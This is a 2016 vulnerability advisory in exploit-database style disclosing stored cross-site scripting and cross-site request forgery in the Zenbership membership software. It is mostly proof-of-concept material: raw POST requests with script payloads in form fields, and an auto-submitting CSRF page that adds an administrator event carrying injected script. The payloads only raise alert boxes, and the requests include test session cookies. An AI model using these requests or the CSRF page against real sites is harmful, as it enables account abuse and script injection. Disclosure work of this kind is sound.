1. ADVISORY INFORMATION ======================================== Title: Zenbership (latest version) - Multiple Vulnerabilities Application: Zenbership Class: Sensitive Information disclosure Versions Affected: <= latest version ) Vendor URL: https://www.zenbership.com/ Software URL: https://www.zenbership.com/Download Bugs: CSRF / Persistent Cross Site Scripting Date of found: 23.10.2016 Author: Besim 2.CREDIT ======================================== Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN 3. VERSIONS AFFECTED ======================================== <= latest version 4. TECHNICAL DETAILS & POC ======================================== PR1 - Stored Cross Site Scripting ======================================== 1 ) Admin login admin panel 2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2) 3 ) Attacker enter xss payload to last name input 4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts) 5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script> ## HTTP Request ## POST /zenbership/pp-functions/form_process.php HTTP/1.1 Host: site_name User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2 Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 153 - POST DATA page=1 &session=zen_0176e737b450bbd83f5fc1066 &first_name=Besim &last_name=<Script>alert('ExploitDB')</Script> &email=exploit@yopmail.com PR2 - CSRF ======================================== 1 ) Attacker can add new event with xss payload (stored) - File : admin/cp-functions/event-add.php HTTP Request and CSRF PoC ========================= ## HTTP Request ## POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1 Host: site_name User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://site_name/zenbership/admin/index.php?l=events Content-Length: 1206 Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44 Connection: close - POST DATA id=JFW996951 &ext= &edit=0 &event[id]=JFW996951&event[status]=1 &event[name]=<Script>alert('Meryem-ExploitDB');</Script> &event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p> &event[post_rsvp_message]=<p>Meryem AKDOGAN</p> &event[calendar_id]=1 &event[custom_template]= &tags= &event[starts]=2016-10-26 00:00:00 &event[ends]=2016-10-28 00:00:00 &event[start_registrations]=2016-10-24 00:00:00 &event[close_registration]=&event[early_bird_end]= &event[online]=0&event[location_name]=Turkey &event[url]=&event[address_line_1]= &event[address_line_2]=&event[city]= &event[state]=&event[zip]= &event[country]= &event[phone]= &limit_attendees_dud=0 &event[max_rsvps]= &event[members_only_view]=0 &event[members_only_rsvp]=0 &event[allow_guests]=1 &event[max_guests]=1 &form[col2][Account Overview]=section &form[col2][company_name]=1 &form[col2][address_line_1]=0 &form[col2][address_line_2]=0 &form[col2][city]=0 &form[col2][state]=0 &form[col2][zip]=0 &form[col2][country]=0 &form[col2][url]=0 ## CSRF PoC ## <html> <!-- CSRF PoC --> <body> <form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST"> <input type="hidden" name="id" value="OXH978786" /> <input type="hidden" name="ext" value="" /> <input type="hidden" name="edit" value="0" /> <input type="hidden" name="event&#91;id&#93;" value="OXH978786" /> <input type="hidden" name="event&#91;status&#93;" value="1" /> <input type="hidden" name="event&#91;name&#93;" value="<script>alert&#40;&apos;Meryem&#45;ExploitDB&apos;&#41;&#59;<&#47;Script>" /> <input type="hidden" name="event&#91;tagline&#93;" value="meryem" /> <input type="hidden" name="event&#91;description&#93;" value="<p>Meryem&#32;AKDOGAN<&#47;p>&#13;&#10;" /> <input type="hidden" name="event&#91;post&#95;rsvp&#95;message&#93;" value="<p>Meryem&#32;AKDOGAN<&#47;p>&#13;&#10;" /> <input type="hidden" name="event&#91;calendar&#95;id&#93;" value="1" /> <input type="hidden" name="event&#91;custom&#95;template&#93;" value="" /> <input type="hidden" name="tags" value="meryem" /> <input type="hidden" name="event&#91;starts&#93;" value="2016&#45;10&#45;26&#32;00&#58;00&#58;00" /> <input type="hidden" name="event&#91;ends&#93;" value="2016&#45;10&#45;28&#32;00&#58;00&#58;00" /> <input type="hidden" name="event&#91;start&#95;registrations&#93;" value="2016&#45;10&#45;24&#32;00&#58;00&#58;00" /> <input type="hidden" name="event&#91;close&#95;registration&#93;" value="" /> <input type="hidden" name="event&#91;early&#95;bird&#95;end&#93;" value="" /> <input type="hidden" name="event&#91;online&#93;" value="0" /> <input type="hidden" name="event&#91;location&#95;name&#93;" value="Turkey" /> <input type="hidden" name="event&#91;url&#93;" value="" /> <input type="hidden" name="event&#91;address&#95;line&#95;1&#93;" value="" /> <input type="hidden" name="event&#91;address&#95;line&#95;2&#93;" value="" /> <input type="hidden" name="event&#91;city&#93;" value="" /> <input type="hidden" name="event&#91;state&#93;" value="" /> <input type="hidden" name="event&#91;zip&#93;" value="" /> <input type="hidden" name="event&#91;country&#93;" value="" /> <input type="hidden" name="event&#91;phone&#93;" value="" /> <input type="hidden" name="limit&#95;attendees&#95;dud" value="0" /> <input type="hidden" name="event&#91;max&#95;rsvps&#93;" value="" /> <input type="hidden" name="event&#91;members&#95;only&#95;view&#93;" value="0" /> <input type="hidden" name="event&#91;members&#95;only&#95;rsvp&#93;" value="0" /> <input type="hidden" name="event&#91;allow&#95;guests&#93;" value="1" /> <input type="hidden" name="event&#91;max&#95;guests&#93;" value="1" /> <input type="hidden" name="form&#91;col2&#93;&#91;Account&#32;Overview&#93;" value="section" /> <input type="hidden" name="form&#91;col2&#93;&#91;company&#95;name&#93;" value="1" /> <input type="hidden" name="form&#91;col2&#93;&#91;address&#95;line&#95;1&#93;" value="0" /> <input type="hidden" name="form&#91;col2&#93;&#91;address&#95;line&#95;2&#93;" value="0" /> <input type="hidden" name="form&#91;col2&#93;&#91;city&#93;" value="0" /> <input type="hidden" name="form&#91;col2&#93;&#91;state&#93;" value="0" /> <input type="hidden" name="form&#91;col2&#93;&#91;zip&#93;" value="0" /> <input type="hidden" name="form&#91;col2&#93;&#91;country&#93;" value="0" /> <input type="hidden" name="form&#91;col2&#93;&#91;url&#93;" value="0" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>